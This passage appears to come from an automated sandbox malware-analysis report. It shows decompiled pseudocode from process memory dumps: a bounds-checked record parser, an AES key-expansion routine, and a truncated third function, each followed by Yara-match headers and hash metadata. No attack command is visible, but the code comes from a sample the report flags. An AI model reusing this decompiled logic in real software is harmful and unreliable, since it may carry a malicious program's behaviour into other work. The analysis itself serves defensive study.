                    				void* _t285;
                    				intOrPtr _t292;
                    				void* _t318;
                    				signed short _t321;
                    				intOrPtr _t326;
                    				void* _t338;
                    				void* _t350;
                    				void* _t362;
                    				signed char _t370;
                    				signed int _t371;
                    				intOrPtr _t374;
                    				intOrPtr* _t375;
                    				signed int _t377;
                    				intOrPtr _t379;
                    				signed int _t384;
                    				signed int _t385;
                    				signed int _t389;
                    				signed int _t395;
                    				signed int _t436;
                    				signed int _t438;
                    				signed char _t442;
                    				intOrPtr _t445;
                    				signed int _t447;
                    				void* _t448;
                    				signed char _t449;
                    				void* _t454;
                    				intOrPtr _t475;
                    				intOrPtr _t480;
                    				intOrPtr _t481;
                    				intOrPtr* _t482;
                    				intOrPtr _t483;
                    				intOrPtr _t484;
                    				intOrPtr _t485;
                    				signed int _t486;
                    				intOrPtr _t488;
                    				signed int _t489;
                    				void* _t490;
                    				void* _t491;
                    				void* _t492;
                    				void* _t493;
                    				void* _t497;
                    				/* temporaries used in the body but missing from the decompiler's declaration list */
                    				intOrPtr _t286;
                    				signed int _t387;
                    				intOrPtr _t399;
                    
                    				_t375 = __ecx;
                    				_v12 = __edx;
                    				_t377 = 0xa;
                    				_t442 =  *(__ecx + 0x308) & 0x0000ffff;
                    				_t486 = 0;
                    				_t251 = memset( &_v72, 0, _t377 << 2);
                    				_t491 = _t490 + 0xc;
                    				 *(_t375 + 0x318) = _t251;
                    				_v28 = _t251;
                    				_v24 = _t251;
                    				_t480 =  *_a4;
                    				_v60 = _t480;
                    				_t379 = _t480;
                    				_v56 = _t379;
                    				if(_t442 < 0x8000) {
                    					L9:
                    					_push(0x48);
                    					_t254 = E105BEB10();
                    					_v72 = _t254;
                    					if(_t254 == 0) {
                    						L8:
                    						_t486 = 0xffffff83;
                    						L120:
                    						E105AB7AB( &_v72);
                    						E105AABE0(_t375);
                    						return _t486;
                    					}
                    					E105C2D6E(_t480, _t254, 0, 0x48);
                    					_t492 = _t491 + 0xc;
                    					if(_t480 - _v56 + 3 > _a8) {
                    						L2:
                    						_t486 = 0xfffffeb8;
                    						goto L120;
                    					}
                    					E105A9ECA(_t480 + _v12,  &_v20);
                    					_t384 = _v20;
                    					_t481 = _t480 + 3;
                    					_v60 = _t481;
                    					_v16 = _t384;
                    					if(_t384 > 0x481e) {
                    						goto L2;
                    					}
                    					_t445 = _v56;
                    					if(_t384 - _t445 + _t481 != _a8) {
                    						goto L2;
                    					}
                    					_t385 = _v52;
                    					if(_t384 == 0) {
                    						L24:
                    						_v44 = _v44 & 0x00000000;
                    						_v48 = _t385;
                    						if(_t385 != 0) {
                    							L30:
                    							_v34 = _v34 & 0x0000fffb;
                    							_t482 = E105BEB10();
                    							_v64 = _t482;
                    							if(_t482 == 0) {
                    								goto L8;
                    							}
                    							E105C2D6E(_t482, _t482, 0, 0x370);
                    							_t387 = _v52;
                    							_t447 = 1;
                    							_t493 = _t492 + 0xc;
                    							 *(_t375 + 0x318) = 1;
                    							if(_t387 <= 0 || _t387 <= 1) {
                    								L50:
                    								if(_t486 != 0) {
                    									goto L120;
                    								}
                    								 *(_t375 + 0x318) = 2;
                    								if(_v48 <= _t486) {
                    									_t448 = 0;
                    									L64:
                    									_t449 = _t448 + 1;
                    									L65:
                    									_t389 = _v34 & _t449;
                    									_v24 = _t389;
                    									if(_t389 == 0 || _t486 == 0) {
                    										 *(_t375 + 0x318) = 3;
                    										if(_v48 <= 0) {
                    											L103:
                    											if(_v24 == 0 || _t486 == 0) {
                    												 *(_t375 + 0x318) = 4;
                    												if(_v40 != 0) {
                    													_t486 =  ==  ? _v40 : _t486;
                    												}
                    												_t486 = E105AB65C( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t486,  &_v72);
                    												_t272 =  *(_t375 + 0x308) & 0x0000ffff;
                    												_t395 = _t272 & 0x00000080;
                    												if(_t395 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
                    													 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
                    													_t486 = 0;
                    												}
                    												if(_t486 == 0) {
                    													if((_t272 & 0x00000030) == 0x10) {
                    														 *((char*)(_t375 + 0x311)) = 5;
                    													}
                    												} else {
                    													if(_t395 == 0) {
                    														E105AB5FD(_t375, _t486);
                    													}
                    													 *(_t375 + 0x1f0) = _t486;
                    												}
                    												_t274 = E105A9F46(_t375);
                    												_t275 = _v60;
                    												if(_t274 != 0) {
                    													_t275 = _t275 +  *((intOrPtr*)(_t375 + 0x300));
                    													_v60 = _t275;
                    												}
                    												 *(_t375 + 0x318) = 5;
                    												 *_a4 = _t275;
                    											}
                    											goto L120;
                    										}
                    										if( *(_t482 + 0x36c) >= 0x80) {
                    											if( *((intOrPtr*)(_t375 + 0x227)) == _t449 && ( *(_t375 + 0x308) & 0x00000030) == 0x10) {
                    												_t486 =  ==  ? 0xfffffe7f : _t486;
                    											}
                    											_t292 =  *((intOrPtr*)(_t375 + 0x228));
                    											if(_t292 == _t449 || _t292 == 3 &&  *((char*)(_t375 + 0x22b)) == 0) {
                    												_t486 =  ==  ? 0xfffffe81 : _t486;
                    											}
                    										}
                    										if(( *(_t482 + 0x36d) & _t449) != 0) {
                    											if(( *(_t375 + 0x308) & 0x00000030) != 0x10) {
                    												_t486 =  ==  ? 0xfffffe7e : _t486;
                    											} else {
                    												if(( *(_t482 + 0x31c) & 0x00000003) == 0) {
                    													_t486 = 0xfffffe7e;
                    												}
                    											}
                    										}
                    										if(_t389 == 0) {
                    											 *(_t375 + 0x30a) =  *(_t375 + 0x30a) | 0x00002000;
                    											if(( *(_t375 + 0x308) & 0x00000080) == 0) {
                    												_t286 =  *((intOrPtr*)(_t375 + 0xf8));
                    												if( *((intOrPtr*)(_t375 + 0xf8)) != 0) {
                    													if( *((intOrPtr*)(_t482 + 0x24)) == 0) {
                    														E105AB4FB( *((intOrPtr*)(_t482 + 0x7c)), _t286);
                    														_t486 =  ==  ? 0xfffffebe : _t486;
                    													} else {
                    														_push(_t389);
                    														if(E105AB5A3(_t286) != 1) {
                    															_t486 = 0xfffffebe;
                    														}
                    													}
                    												}
                    											}
                    											if( *((intOrPtr*)(_t482 + 0x1c)) != 0x206) {
                    												goto L103;
                    											} else {
                    												_v28 = _v28 & 0x00000000;
                    												_t280 = _t375 + 0x37c;
                    												_t399 =  *_t280;
                    												if( *_t280 != 0) {
                    													if( *((char*)(_t375 + 0x382)) == 0) {
                    														L96:
                    														_t281 = E105B7899( *_t482,  &_v28,  *_t280,  *((intOrPtr*)(_t482 + 4)));
                    														if(_t281 != 0) {
                    															L98:
                    															_t486 = 0xfffffeaa;
                    															L99:
                    															if(_t486 == 0 &&  *((char*)(_t375 + 0x382)) != 0 && ( *(_t375 + 0x308) & 0x00000080) == 0) {
                    																E105BAE22( *((intOrPtr*)(_t375 + 0x37c)));
                    																_t486 =  <  ? 0xfffffe66 : _t486;
                    															}
                    															goto L103;
                    														}
                    														 *((char*)(_t375 + 0x382)) = _t281 + 1;
                    														goto L99;
                    													}
                    													_t285 = E105AABBF(_t375, _t399);
                    													 *((char*)(_t375 + 0x382)) = 0;
                    													L94:
                    													if(_t285 != 0) {
                    														goto L98;
                    													}
                    													_t280 = _t375 + 0x37c;
                    													goto L96;
                    												}
                    												_push(_t280);
                    												_t454 = 0x25;
                    												_t285 = E105AAB2E(_t454);
                    												goto L94;
                    											}
                    										} else {
                    											 *(_t375 + 0x1f0) = _t486;
                    											goto L120;
                    										}
                    									} else {
                    										goto L120;
                    									}
                    								}
                    								_v44 = _v44 & _t486;
                    								_t486 = E105AB7F9(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
                    								if(_t486 != 0) {
                    									if(_t486 == 0xffffff74 || _t486 == 0xffffff7c) {
                    										_t482 = _v64;
                    										_t449 = 1;
                    										_v34 = _v34 | 1;
                    									} else {
                    										_t482 = _v64;
                    										_t449 = 1;
                    										if( *((intOrPtr*)(_t375 + 0x80)) == 0) {
                    											_v34 = _v34 | 1;
                    										} else {
                    											_v34 = _v34 ^ (_v34 >> 0x00000001 ^ _v34) & 1;
                    										}
                    									}
                    									goto L65;
                    								}
                    								_t482 = _v64;
                    								_t448 = 0;
                    								if((_v34 & 0x00000002) == 0) {
                    									_v34 = _v34 & 0x0000fffe;
                    									goto L64;
                    								} else {
                    									_t486 = _v40;
                    									_t449 = 1;
                    									_v34 = _v34 | 1;
                    									goto L65;
                    								}
                    							} else {
                    								do {
                    									_v44 = _v48 - 1;
                    									_t318 = E105AB7F9(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
                    									_t493 = _t493 + 0x10;
                    									if(_t318 == 0) {
                    										_t318 = E105AB8D6(_t375,  &_v72);
                    									}
                    									_t486 = E105AB65C( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t318,  &_v72);
                    									_t321 =  *(_t375 + 0x308) & 0x00000080;
                    									if(_t321 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
                    										 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
                    										_t486 = 0;
                    									}
                    									_t482 = _v64;
                    									if(_t486 != 0) {
                    										L45:
                    										if(( *(_t375 + 0x308) & 0x00000080) == 0) {
                    											E105AB5FD(_t375, _t486);
                    										}
                    										 *(_t375 + 0x1f0) = _t486;
                    										if(_v40 == 0) {
                    											_v40 = _t486;
                    											_t486 = 0;
                    										}
                    										goto L49;
                    									}
                    									if(( *(_t482 + 0x36c) & 0x00000010) != 0 && _t321 == 0 && _v24 == 0) {
                    										_v20 = _v20 & 0x00000000;
                    										_t486 = E105B750E( &_v20,  *((intOrPtr*)(_v72 + 4 + _v44 * 8)), 5,  *((intOrPtr*)(_t375 + 0x84)));
                    										if(_t486 < 0) {
                    											goto L120;
                    										}
                    										E105C334E( *_v20,  *((intOrPtr*)(_v72 + _v44 * 8)),  *((intOrPtr*)(_v72 + 4 + _v44 * 8)));
                    										_t493 = _t493 + 0xc;
                    										_t486 =  ==  ? 0 : E105AD9B1( *((intOrPtr*)( *_t375 + 0x50)),  &_v20, 2, 0);
                    										if(_t486 == 0) {
                    											goto L49;
                    										}
                    										goto L45;
                    									}
                    									L49:
                    									_t387 = _t482;
                    									E105B50C9(_t482);
                    									_v34 = _v34 & 0x0000fffb;
                    									_t447 = 1;
                    									_t326 = _v48 - 1;
                    									_v48 = _t326;
                    								} while (_t326 > 1);
                    								goto L50;
                    							}
                    						}
                    						if(( *(_t375 + 0x30c) & 0x00002000) != 0) {
                    							L28:
                    							if(( *(_t375 + 0x308) & 0x00000030) == 0) {
                    								_t486 = 0xfffffea7;
                    								E105AB5FD(_t375, 0xfffffea7);
                    							}
                    							goto L30;
                    						}
                    						if(( *(_t375 + 0x308) & 0x00000100) == 0) {
                    							goto L30;
                    						}
                    						_t338 = E105A9F2A( *(_t375 + 0x218) & 0x0000ffff);
                    						_t492 = _t492 + 4;
                    						if(_t338 == 0) {
                    							goto L30;
                    						}
                    						goto L28;
                    					}
                    				L14:
                    					if(_t385 >= ( *(_t375 + 0x20e) & 0x000000ff) || _t385 >= 9) {
                    						_t486 = 0xfffffe90;
                    					} else {
                    						goto L16;
                    					}
                    					goto L120;
                    					L16:
                    					if(_t481 - _t445 + 3 > _a8) {
                    						goto L2;
                    					}
                    					E105A9ECA(_t481 + _v12,  &_v20);
                    					_t483 = _t481 + 3;
                    					_v60 = _t483;
                    					if(_v20 - _v56 + _t483 > _a8) {
                    						goto L2;
                    					}
                    					_t436 = _v52;
                    					 *((intOrPtr*)(_v72 + 4 + _t436 * 8)) = _v20;
                    					_t481 = _t483 + _v20;
                    					_v60 = _t481;
                    					 *((intOrPtr*)(_v72 + _t436 * 8)) = _v12 + _t483;
                    					_t445 = _v56;
                    					_t350 = 0xfffffffd;
                    					_v16 = _v16 + _t350 - _v20;
                    					if( *(_t375 + 0x308) < 0x8000) {
                    						L23:
                    						_t385 = _t436 + 1;
                    						_v52 = _t385;
                    						if(_v16 != 0) {
                    							goto L14;
                    						}
                    						goto L24;
                    					}
                    					if(_t481 - _t445 + 2 > _a8) {
                    						goto L2;
                    					}
                    					_t488 = _v12;
                    					E105A9EE4(_t481 + _t488,  &_v8);
                    					_t484 = _t481 + 2;
                    					_v60 = _t484;
                    					if((_v8 & 0x0000ffff) - _v56 + _t484 > _a8) {
                    						goto L2;
                    					}
                    					_t438 = _v52;
                    					_t475 = _v68;
                    					 *(_t475 + 4 + _t438 * 8) = _v8 & 0x0000ffff;
                    					_t489 = _v8 & 0x0000ffff;
                    					 *((intOrPtr*)(_t475 + _t438 * 8)) = _t484 + _t488;
                    					_t481 = _t484 + _t489;
                    					_t362 = 0xfffffffe;
                    					_v60 = _t481;
                    					_v16 = _v16 + _t362 - _t489;
                    					_t486 = E105B0461(_t375,  *((intOrPtr*)(_t475 + _t438 * 8)), _t497,  *(_t475 + 4 + _t438 * 8) & 0x0000ffff, 0xb, 0);
                    					_t492 = _t492 + 0xc;
                    					if(_t486 < 0) {
                    						goto L120;
                    					} else {
                    						_t436 = _v52;
                    						_t445 = _v56;
                    						goto L23;
                    					}
                    				}
                    				if(_t480 - _t379 + 1 <= _a8) {
                    					_t370 =  *((intOrPtr*)(_t480 + _v12));
                    					_t485 = _t480 + 1;
                    					_v7 = _t370;
                    					_t371 = _t370 & 0x000000ff;
                    					_v20 = _t371;
                    					_v60 = _t485;
                    					if(_t371 - _t379 + _t485 > _a8) {
                    						goto L2;
                    					}
                    					if((_t442 & 0x00000030) != 0x10 || _v7 == 0) {
                    						_t480 = _t485 + _v20;
                    						_push(0x48);
                    						_v60 = _t480;
                    						_t374 = E105BEB10();
                    						_v68 = _t374;
                    						if(_t374 != 0) {
                    							goto L9;
                    						}
                    						goto L8;
                    					} else {
                    						_t486 = 0xfffffe5c;
                    						goto L120;
                    					}
                    				}
                    				goto L2;
                    			}
                    Instruction addresses for the listing above: 0x105ab917 to 0x105ac067 (the address column of the decompiled view; its per-line alignment with the C code did not survive extraction)

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4011f54b20b6d99306f17f811412d5ffe036df645d5cd64277433858df453dba
                    • Instruction ID: 2b88e946ad14904156fa2bb41125767ac42fe93937e5122c92d3d3661b30d9ea
                    • Opcode Fuzzy Hash: 4011f54b20b6d99306f17f811412d5ffe036df645d5cd64277433858df453dba
                    • Instruction Fuzzy Hash: 5F22D271A0025ADBEF05CF68C8907EEBBB5EF84350F154969EC55AB286DB309E41CBD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: df6738b7a1d861f86abd809277f986c405beb7f99ca6919811340b7ef6a53347
                    • Instruction ID: 49bedcb936ec6ce3924db17fa1c14752e1e0bec2c1eaa22c03ee826eb31dc35c
                    • Opcode Fuzzy Hash: df6738b7a1d861f86abd809277f986c405beb7f99ca6919811340b7ef6a53347
                    • Instruction Fuzzy Hash: F022F371A012199BDF15CF68C8907EEB7B1EF44314F18416BEC55AB382DB389E81CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 99%
                    			E105B3725(signed int* __ecx, void* __edx, unsigned int _a4, intOrPtr _a8, intOrPtr _a12) {
                    				signed int* _v8;
                    				signed int _t250;
                    				signed int _t267;
                    				void* _t270;
                    				intOrPtr _t314;
                    				signed int _t330;
                    				signed int _t351;
                    				signed int _t369;
                    				signed int _t387;
                    				signed int _t406;
                    				signed int _t413;
                    				signed char* _t414;
                    				signed int _t425;
                    				signed int _t427;
                    				signed int _t431;
                    				intOrPtr _t455;
                    				signed int _t459;
                    				signed int _t461;
                    				signed int _t464;
                    				signed int _t467;
                    				signed int _t469;
                    				signed int _t470;
                    				signed int _t473;
                    				signed int _t476;
                    				signed int _t482;
                    				intOrPtr* _t493;
                    				signed int _t500;
                    				signed int _t506;
                    				signed int _t513;
                    				signed int _t519;
                    				signed int _t525;
                    				unsigned int _t527;
                    				signed int* _t528;
                    				void* _t530;
                    				intOrPtr* _t532;
                    				signed int* _t534;
                    				signed int* _t535;
                    				signed int* _t537;
                    				void* _t538;
                    				intOrPtr _t539;
                    				void* _t541;
                    				void* _t542;
                    				void* _t543;
                    
                    				_push(__ecx);
                    				_t527 = _a4;
                    				_t537 = __ecx;
                    				_v8 = __ecx;
                    				 *(__ecx + 0xf4) = _t527;
                    				 *((intOrPtr*)(__ecx + 0xf0)) = (_t527 >> 2) + 6;
                    				E105C334E(__ecx, __edx, _t527);
                    				E105B311D(_t537, _t537, _t527);
                    				if(_t527 == 0x10) {
                    					_t476 = _t537[3];
                    					_t528 =  &(_t537[1]);
                    					_t425 = ( *(0x462118 + (_t476 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461d18 + (_t476 >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t476 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
                    					_t537[4] = _t425;
                    					_t250 =  *_t528 ^ _t425;
                    					_t427 = _t537[2] ^ _t250;
                    					_t537[5] = _t250;
                    					_t537[6] = _t427;
                    					_t537[7] = _t427 ^ _t476;
                    					_t538 = 4;
                    					do {
                    						_t528 =  &(_t528[4]);
                    						_t429 = _t528[2];
                    						_t122 = _t538 + 0x4608f0; // 0x2000000
                    						_t538 = _t538 + 4;
                    						_t482 =  *(0x461d18 + (_t528[2] >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t528[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x461918 + (_t429 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t528 - 4);
                    						_t528[3] = _t482;
                    						_t267 =  *_t528 ^ _t482;
                    						_t528[4] = _t267;
                    						_t431 = _t528[1] ^ _t267;
                    						_t528[5] = _t431;
                    						_t528[6] = _t528[2] ^ _t431;
                    					} while (_t538 != 0x28);
                    					goto L12;
                    				} else {
                    					if(_t527 == 0x18) {
                    						_t457 = _t537[5];
                    						_t534 =  &(_t537[0xa]);
                    						_t500 = ( *(0x462118 + (_t537[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461d18 + (_t457 >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t457 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t457 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
                    						_t330 = _t537[1] ^ _t500;
                    						_t537[6] = _t500;
                    						_t537[7] = _t330;
                    						_t459 = _t537[2] ^ _t330;
                    						_t537[8] = _t459;
                    						_t537[9] = _t537[3] ^ _t459;
                    						_t542 = 4;
                    						do {
                    							_t461 =  *(_t534 - 0x18) ^  *(_t534 - 4);
                    							 *_t534 = _t461;
                    							_t534[1] =  *(_t534 - 0x14) ^ _t461;
                    							_t534 =  &(_t534[6]);
                    							_t462 =  *(_t534 - 0x14);
                    							_t88 = _t542 + 0x4608f0; // 0x2000000
                    							_t542 = _t542 + 4;
                    							_t506 =  *(0x461d18 + ( *(_t534 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + ( *(_t534 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_t462 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x461918 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t534 - 0x28);
                    							 *(_t534 - 0x10) = _t506;
                    							_t351 =  *(_t534 - 0x24) ^ _t506;
                    							 *(_t534 - 0xc) = _t351;
                    							_t464 =  *(_t534 - 0x20) ^ _t351;
                    							 *(_t534 - 8) = _t464;
                    							 *(_t534 - 4) =  *(_t534 - 0x1c) ^ _t464;
                    						} while (_t542 != 0x20);
                    						goto L12;
                    					} else {
                    						if(_t527 == 0x20) {
                    							_t465 = _t537[7];
                    							_t535 =  &(_t537[0xc]);
                    							_t513 = ( *(0x462118 + (_t537[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461d18 + (_t465 >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t465 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t465 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
                    							_t369 = _t537[1] ^ _t513;
                    							_t537[8] = _t513;
                    							_t537[9] = _t369;
                    							_t467 = _t537[2] ^ _t369;
                    							_t537[0xa] = _t467;
                    							_t537[0xb] = _t537[3] ^ _t467;
                    							_t543 = 4;
                    							do {
                    								_t468 =  *(_t535 - 4);
                    								_t469 =  *(_t535 - 0x18);
                    								_t519 =  *(0x462518 + ( *(_t535 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + ( *(_t535 - 4) >> 0x18) * 4) & 0xff000000 ^  *(0x461918 + (_t468 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x461d18 + (_t468 & 0x000000ff) * 4) & 0x000000ff ^  *(_t535 - 0x20);
                    								_t387 =  *(_t535 - 0x1c) ^ _t519;
                    								 *_t535 = _t519;
                    								_t535[1] = _t387;
                    								_t535 =  &(_t535[8]);
                    								_t470 = _t469 ^ _t387;
                    								 *(_t535 - 0x18) = _t470;
                    								 *(_t535 - 0x14) =  *(_t535 - 0x34) ^ _t470;
                    								_t471 =  *(_t535 - 0x14);
                    								_t48 = _t543 + 0x4608f0; // 0x2000000
                    								_t543 = _t543 + 4;
                    								_t525 =  *(0x461d18 + ( *(_t535 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + ( *(_t535 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_t471 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x461918 + (_t471 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t48 ^  *(_t535 - 0x30);
                    								 *(_t535 - 0x10) = _t525;
                    								_t406 =  *(_t535 - 0x2c) ^ _t525;
                    								 *(_t535 - 0xc) = _t406;
                    								_t473 =  *(_t535 - 0x28) ^ _t406;
                    								 *(_t535 - 8) = _t473;
                    								 *(_t535 - 4) =  *(_t535 - 0x24) ^ _t473;
                    							} while (_t543 != 0x1c);
                    							L12:
                    							_t539 = _v8;
                    							_t530 = 1;
                    							if(_a12 == 1) {
                    								_t413 =  *(_t539 + 0xf0) << 2;
                    								if(_t413 != 0) {
                    									_t493 = _t539 + (_t413 + 2) * 4;
                    									_t532 = _t539 + 8;
                    									_t541 = 0;
                    									do {
                    										_t541 = _t541 + 4;
                    										_t413 = _t413 - 4;
                    										 *((intOrPtr*)(_t532 - 8)) =  *((intOrPtr*)(_t493 - 8));
                    										 *((intOrPtr*)(_t493 - 8)) =  *((intOrPtr*)(_t532 - 8));
                    										 *((intOrPtr*)(_t532 - 4)) =  *((intOrPtr*)(_t493 - 4));
                    										 *((intOrPtr*)(_t493 - 4)) =  *((intOrPtr*)(_t532 - 4));
                    										_t455 =  *_t532;
                    										 *_t532 =  *_t493;
                    										_t532 = _t532 + 0x10;
                    										_t314 =  *((intOrPtr*)(_t493 + 4));
                    										 *_t493 = _t455;
                    										_t493 = _t493 - 0x10;
                    										 *((intOrPtr*)(_t532 - 0xc)) = _t314;
                    										 *((intOrPtr*)(_t493 + 0x14)) =  *((intOrPtr*)(_t532 - 0xc));
                    									} while (_t541 < _t413);
                    									_t539 = _v8;
                    									_t530 = 1;
                    								}
                    								if( *(_t539 + 0xf0) > _t530) {
                    									_t414 = _t539 + 8;
                    									do {
                    										_t414 =  &(_t414[0x10]);
                    										_t484 =  *(_t414 - 8);
                    										_t486 =  *(_t414 - 4);
                    										 *(_t414 - 8) =  *(0x460918 + ( *(0x461d18 + ( *(_t414 - 8) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + ( *(_t414 - 8) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t484 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + ( *(_t414 - 8) & 0x000000ff) * 4) & 0x000000ff) * 4);
                    										_t488 =  *_t414;
                    										 *(_t414 - 4) =  *(0x460918 + ( *(0x461d18 + ( *(_t414 - 4) >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + ( *(_t414 - 4) >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t486 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + ( *(_t414 - 4) & 0x000000ff) * 4) & 0x000000ff) * 4);
                    										_t490 = _t414[4];
                    										 *_t414 =  *(0x460918 + ( *(0x461d18 + ( *_t414 >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + ( *_t414 >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t488 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + ( *_t414 & 0x000000ff) * 4) & 0x000000ff) * 4);
                    										_t530 = _t530 + 1;
                    										_t414[4] =  *(0x460918 + ( *(0x461d18 + (_t414[4] >> 0x18) * 4) & 0x000000ff) * 4) ^  *(0x460d18 + ( *(0x461d18 + (_t414[4] >> 0x00000010 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461118 + ( *(0x461d18 + (_t490 >> 0x00000008 & 0x000000ff) * 4) & 0x000000ff) * 4) ^  *(0x461518 + ( *(0x461d18 + (_t414[4] & 0x000000ff) * 4) & 0x000000ff) * 4);
                    									} while (_t530 <  *(_t539 + 0xf0));
                    								}
                    							}
                    							_t270 = E105B3D1C(_t539, _a8);
                    						} else {
                    							_t270 = 0xffffff53;
                    						}
                    					}
                    				}
                    				return _t270;
                    			}
                    Instruction addresses for E105B3725: 0x105b3728 to 0x105b3ccf (the address column of the decompiled view; its per-line alignment with the C code did not survive extraction)

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                    • Instruction ID: c297c6908e85115593ee96851978bfdc2db59a00bc79fb68234f556a2b2785c5
                    • Opcode Fuzzy Hash: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                    • Instruction Fuzzy Hash: 5002BF716005529FC318CF2EEC91526B7E1EF8E301709853AE486D7395EB74FA22DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                    • Instruction ID: 2ff722b402dd1cb968047811478b8eaada24175be06acbaae8cb73f1bee3a1e2
                    • Opcode Fuzzy Hash: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                    • Instruction Fuzzy Hash: 3E02C1716005519FD318CF2EEC9153AB7E1EF8E301748853AE486C7395EB74EA22DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 2e3b19bf7ee36a531d95d42fa299a25bd2e154ed583d8d0915d7b163c9cd7bd2
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: C8C1B63220509349DF2D463984340BFBAA19ED67B5B1A276FD4B3CF2D4EF28E924D524
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E105B322E(signed int* __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                    				signed int _v8;
                    				unsigned int _v12;
                    				unsigned int _v16;
                    				unsigned int _v20;
                    				unsigned int _v24;
                    				unsigned int _v28;
                    				unsigned int _v32;
                    				unsigned int _v36;
                    				unsigned int _t222;
                    				signed int _t229;
                    				signed int _t230;
                    				signed int _t258;
                    				intOrPtr _t338;
                    				intOrPtr _t347;
                    				intOrPtr _t356;
